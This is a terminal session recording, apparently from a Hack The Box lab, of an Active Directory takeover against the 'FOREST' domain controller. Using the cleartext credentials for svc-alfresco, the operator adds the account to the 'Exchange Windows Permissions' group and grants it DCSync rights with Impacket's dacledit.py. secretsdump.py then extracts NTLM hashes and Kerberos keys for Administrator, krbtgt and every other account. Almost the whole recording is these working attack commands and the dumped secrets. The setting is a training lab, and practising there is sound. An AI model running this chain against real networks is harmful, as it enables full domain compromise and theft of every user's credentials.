{"version":3,"term":{"cols":160,"rows":48,"type":"xterm-256color","theme":{"fg":"#cccccc","bg":"#141d2b","palette":"#141d2b:#ff3e3e:#6fa700:#b57c00:#0086ff:#9f00ff:#00d49c:#a4b1cd:#181f2b:#ff5d5d:#9fef00:#ffaf00:#2c9bff:#ac23ff:#2ee7b6:#b5bfd5"}},"timestamp":1760662070,"idle_time_limit":2.0,"env":{"SHELL":"/bin/bash"}}
[0.506802, "o", "\u001b[0m\u001b[0m\u001b[0m"]
[0.000089, "o", "\u001b[0m"]
[0.040491, "o", "\u001b[0m"]
[0.001747, "o", "\u001b[0m\u001b[0m"]
[0.000017, "o", "\u001b[0m"]
[0.000103, "o", "\u001b[0m"]
[0.044909, "o", "\u001b[0m"]
[0.000029, "o", "\u001b[0m"]
[0.00001, "o", "\u001b[0m"]
[0.002127, "o", "\u001b[0m"]
[0.004685, "o", "\u001b[0m\u001b[0m"]
[0.000561, "o", "\u001b[0m\u001b[0m\u001b[0m"]
[0.000058, "o", "\u001b[0m\u001b[0m"]
[0.002577, "o", "\u001b[0m"]
[0.001435, "o", "\u001b[0m\u001b[0m\u001b[0m"]
[0.000085, "o", "\u001b[0m\u001b[0m"]
[0.000095, "o", "\u001b[0m"]
[0.00002, "o", "\u001b[0m\u001b[0m"]
[0.00005, "o", "\u001b[0m\u001b[0m"]
[0.00004, "o", "\u001b[0m"]
[0.000154, "o", "\u001b[0m\u001b[0m"]
[0.000018, "o", "\u001b[0m\u001b[0m"]
[0.000052, "o", "\u001b[0m\u001b[0m"]
[0.000046, "o", "\u001b[0m\u001b[0m\u001b[0m"]
[0.000277, "o", "\u001b[0m\u001b[0m"]
[0.000095, "o", "\u001b[0m\u001b[0m"]
[0.000083, "o", "\u001b[0m\u001b[0m\u001b[0m"]
[0.00005, "o", "\u001b[0m\u001b[0m\u001b[0m"]
[0.000035, "o", "\u001b[0m"]
[0.000028, "o", "\u001b[0m"]
[0.000033, "o", "\u001b[0m"]
[0.000026, "o", "\u001b[0m"]
[0.000056, "o", "\u001b[0m"]
[0.000089, "o", "\u001b[0m\u001b[0m\u001b[0m\u001b[0m\u001b[0m\u001b[0m"]
[0.000031, "o", "\u001b[0m\u001b[0m"]
[0.000012, "o", "\u001b[0m"]
[0.000319, "o", "\u001b[0m\u001b[0m\u001b[0m\u001b[0m\u001b[0m\u001b[0m\u001b[0m\u001b[0m\u001b[0m\u001b[0m\u001b[0m\u001b[0m\u001b[0m\u001b[0m\u001b[0m"]
[0.000049, "o", "\u001b[0m"]
[0.000054, "o", "\u001b[0m"]
[0.000715, "o", "\u001b[0m"]
[0.015264, "o", "\u001b[?2004h\u001b[1;32m┌─[\u001b[1;34msg-dedivip-1\u001b[1;32m]─[\u001b[1;37m10.10.14.107\u001b[1;32m]─[\u001b[1;37mlambermaybe\u001b[01;32m@\u001b[01;34mhtb-fiabh8rq5n\u001b[1;32m]─[\u001b[1;37m~\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m"]
[3.000461, "o", "\u001b[7mnet rpc group addmem \"Exchange Windows Permissions\" \"svc-alfresco\" -U \"htb.local\"/\"svc-alfresco\"%\"s3rvice\" -S 10.129.24.190\u001b[27m"]
[0.388397, "o", "\u0007\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[Cnet rpc group addmem \"Exchange Windows Permissions\" \"svc-alfresco\" -U \"htb.local\"/\"svc-alfresco\"%\"s3rvice\" -S 10.129.24.190"]
[0.840247, "o", "\r\n\u001b[?2004l\r"]
[0.010254, "o", "\u001b[0m"]
[0.11634, "o", "\u001b[?2004h\u001b[1;32m┌─[\u001b[1;34msg-dedivip-1\u001b[1;32m]─[\u001b[1;37m10.10.14.107\u001b[1;32m]─[\u001b[1;37mlambermaybe\u001b[01;32m@\u001b[01;34mhtb-fiabh8rq5n\u001b[1;32m]─[\u001b[1;37m~\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m"]
[8.736961, "o", "\u001b[7mnet rpc group members \"EXCHANGE WINDOWS PERMISSIONS\" -U \"htb.local\"/\"svc-alfresco\"%\"s3rvice\" -S 10.129.24.190\u001b[27m"]
[0.341184, "o", "\u0007"]
[0.000012, "o", "\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[Cnet rpc group members \"EXCHANGE WINDOWS PERMISSIONS\" -U \"htb.local\"/\"svc-alfresco\"%\"s3rvice\" -S 10.129.24.190"]
[0.72586, "o", "\r\n\u001b[?2004l\r"]
[0.010646, "o", "\u001b[0m"]
[0.082319, "o", "HTB\\Exchange Trusted Subsystem\r\nHTB\\svc-alfresco\r\n"]
[0.020057, "o", "\u001b[?2004h\u001b[1;32m┌─[\u001b[1;34msg-dedivip-1\u001b[1;32m]─[\u001b[1;37m10.10.14.107\u001b[1;32m]─[\u001b[1;37mlambermaybe\u001b[01;32m@\u001b[01;34mhtb-fiabh8rq5n\u001b[1;32m]─[\u001b[1;37m~\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m"]
[4.708873, "o", "\u001b[7mdacledit.py -action 'write' -rights 'DCSync'\u001b[27m"]
[0.340467, "o", "\u0007\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[Cdacledit.py -action 'write' -rights 'DCSync'"]
[0.522023, "o", " "]
[5.173866, "o", "\u001b[7m-principal 'svc-alfresco'\u001b[27m"]
[0.405706, "o", "\u0007\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b-principal 'svc-alfresco'"]
[0.506183, "o", " "]
[4.111841, "o", "\u001b[7m-target-dn 'DC=HTB,DC=LOCAL'\u001b[27m"]
[0.430784, "o", "\u0007"]
[0.000016, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b-target-dn 'DC=HTB,DC=LOCAL'"]
[0.551416, "o", " "]
[3.618759, "o", "\u001b[7m-dc-ip 10.129.24.190\u001b[27m"]
[0.388657, "o", "\u0007"]
[0.000051, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b-dc-ip 10.129.24.190"]
[0.481759, "o", " "]
[4.314792, "o", "\u001b[7m'htb.local'/'svc-alfresco':'s\u001b[27m\u001b[7m3\u001b[27m\u001b[7mrvice'\u001b[27m"]
[0.386385, "o", "\u0007"]
[0.000081, "o", "\u001b[A\r\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C'htb.local'/'svc-alfresco':'s3rvice'"]
[2.179184, "o", "\r\n\u001b[?2004l\r"]
[0.010804, "o", "\u001b[0m"]
[0.460451, "o", "Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies \r\n\r\n"]
[0.314609, "o", "[*] DACL backed up to dacledit-20251016-194834.bak\r\n"]
[0.017197, "o", "[*] DACL modified successfully!\r\n"]
[0.078505, "o", "\u001b[?2004h\u001b[1;32m┌─[\u001b[1;34msg-dedivip-1\u001b[1;32m]─[\u001b[1;37m10.10.14.107\u001b[1;32m]─[\u001b[1;37mlambermaybe\u001b[01;32m@\u001b[01;34mhtb-fiabh8rq5n\u001b[1;32m]─[\u001b[1;37m~\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m"]
[6.643679, "o", "\u001b[7msecretsdump.py 'htb.local'/'svc-alfresco':'s3rvice'@'10.129.24.190' \u001b[27m"]
[0.415009, "o", "\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[Csecretsdump.py 'htb.local'/'svc-alfresco':'s3rvice'@'10.129.24.190' \r\n\u001b[?2004l\r"]
[0.012896, "o", "\u001b[0m"]
[0.295706, "o", "Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies \r\n\r\n"]
[0.03988, "o", "[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied \r\n"]
[0.027677, "o", "[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)\r\n[*] Using the DRSUAPI method to get NTDS.DIT secrets\r\n"]
[0.113061, "o", "htb.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::\r\n"]
[0.01316, "o", "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\n"]
[0.013504, "o", "krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::\r\n"]
[0.012987, "o", "DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\n"]
[0.012984, "o", "htb.local\\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\n"]
[0.012206, "o", "htb.local\\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\n"]
[0.01122, "o", "htb.local\\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\n"]
[0.011805, "o", "htb.local\\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\n"]
[0.011906, "o", "htb.local\\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\n"]
[0.011636, "o", "htb.local\\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\n"]
[0.011549, "o", "htb.local\\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\n"]
[0.012036, "o", "htb.local\\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\n"]
[0.011167, "o", "htb.local\\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\n"]
[0.011687, "o", "htb.local\\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\r\n"]
[0.014212, "o", "htb.local\\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::\r\n"]
[0.015284, "o", "htb.local\\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::\r\n"]
[0.015625, "o", "htb.local\\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::\r\n"]
[0.0147, "o", "htb.local\\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::\r\n"]
[0.013723, "o", "htb.local\\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::\r\n"]
[0.015135, "o", "htb.local\\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::\r\n"]
[0.014899, "o", "htb.local\\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::\r\n"]
[0.01634, "o", "htb.local\\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::\r\n"]
[0.016712, "o", "htb.local\\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::\r\n"]
[0.014361, "o", "htb.local\\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::\r\n"]
[0.014536, "o", "htb.local\\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::\r\n"]
[0.014366, "o", "htb.local\\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::\r\n"]
[0.013556, "o", "htb.local\\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::\r\n"]
[0.014331, "o", "htb.local\\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::\r\n"]
[0.014703, "o", "htb.local\\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::\r\n"]
[0.013772, "o", "htb.local\\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::\r\n"]
[0.013505, "o", "htb.local\\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::\r\n"]
[0.015619, "o", "FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:014fcc98e4a3da251e2364e885e2601d:::\r\n"]
[0.013623, "o", "EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::\r\n"]
[0.001949, "o", "[*] Kerberos keys grabbed\r\nhtb.local\\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913\r\nhtb.local\\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375\r\nhtb.local\\Administrator:des-cbc-md5:c1e049c71f57343b\r\nkrbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b\r\nkrbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58\r\nkrbtgt:des-cbc-md5:9dd5647a31518ca8\r\nhtb.local\\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4\r\nhtb.local\\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e\r\nhtb.local\\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e\r\n"]
[0.000026, "o", "htb.local\\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf\r\nhtb.local\\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd\r\nhtb.local\\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e\r\nhtb.local\\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e\r\nhtb.local\\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed\r\nhtb.local\\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983\r\nhtb.local\\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91\r\nhtb.local\\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f\r\nhtb.local\\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a\r\n"]
[0.000108, "o", "htb.local\\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c\r\nhtb.local\\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8\r\nhtb.local\\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d\r\nhtb.local\\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81\r\nhtb.local\\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6\r\nhtb.local\\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5\r\nhtb.local\\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a\r\nhtb.local\\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2\r\nhtb.local\\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29\r\n"]
[0.000011, "o", "htb.local\\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7\r\nhtb.local\\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538\r\nhtb.local\\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702\r\nhtb.local\\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352\r\nhtb.local\\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d\r\nhtb.local\\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701\r\nhtb.local\\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd\r\nhtb.local\\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36\r\nhtb.local\\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb\r\nhtb.local\\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c\r\nhtb.local\\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3\r\nhtb.local\\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054\r\nhtb.local\\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161\r\nhtb.local\\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a\r\nhtb.local\\sebastien:des-cbc-md5:702a3445e0d65b58\r\nhtb.local\\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5\r\nhtb.local\\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad\r\nhtb.local\\lucinda:des-cbc-md5:a13bb56bd043a2ce\r\nhtb.local\\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32\r\nhtb.local\\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea\r\nhtb.local\\svc-alfresco:des-cbc-md5:014ac86d0b98294a\r\nhtb.local\\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f\r\nhtb.local\\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6\r\nhtb.local\\andy:des-cbc-md5:a2ab5eef017fb9da\r\nhtb.local\\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6\r\nhtb.local\\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81\r\nhtb.local\\mark:des-cbc-md5:b5dff1f40b8f3be9\r\nhtb.local\\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427\r\nhtb.local\\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25\r\n"]
[0.000013, "o", "htb.local\\santi:des-cbc-md5:4075ad528ab9e5fd\r\nFOREST$:aes256-cts-hmac-sha1-96:028263ad5d163abf425d1eef4ce80ed15325990efb67e384dcfe379b01f6b321\r\nFOREST$:aes128-cts-hmac-sha1-96:50210f5f0676c563ef302e4006f4567f\r\nFOREST$:des-cbc-md5:c8132fbf73c71fa8\r\n"]
[0.000004, "o", "EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6\r\nEXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e\r\n"]
[0.000002, "o", "EXCH01$:des-cbc-md5:8c45f44c16975129\r\n"]
[0.000204, "o", "[*] Cleaning up... \r\n"]
[0.060929, "o", "\u001b[?2004h\u001b[1;32m┌─[\u001b[1;34msg-dedivip-1\u001b[1;32m]─[\u001b[1;37m10.10.14.107\u001b[1;32m]─[\u001b[1;37mlambermaybe\u001b[01;32m@\u001b[01;34mhtb-fiabh8rq5n\u001b[1;32m]─[\u001b[1;37m~\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m"]
[3.373543, "o", "e"]
[0.152074, "o", "x"]
[0.184791, "o", "i"]
[0.159395, "o", "t"]
[0.201076, "o", "\r\n\u001b[?2004l\r"]
[0.012184, "o", "\u001b[0m"]
[0.000218, "o", "exit\r\n"]
[0.000588, "x", "0"]
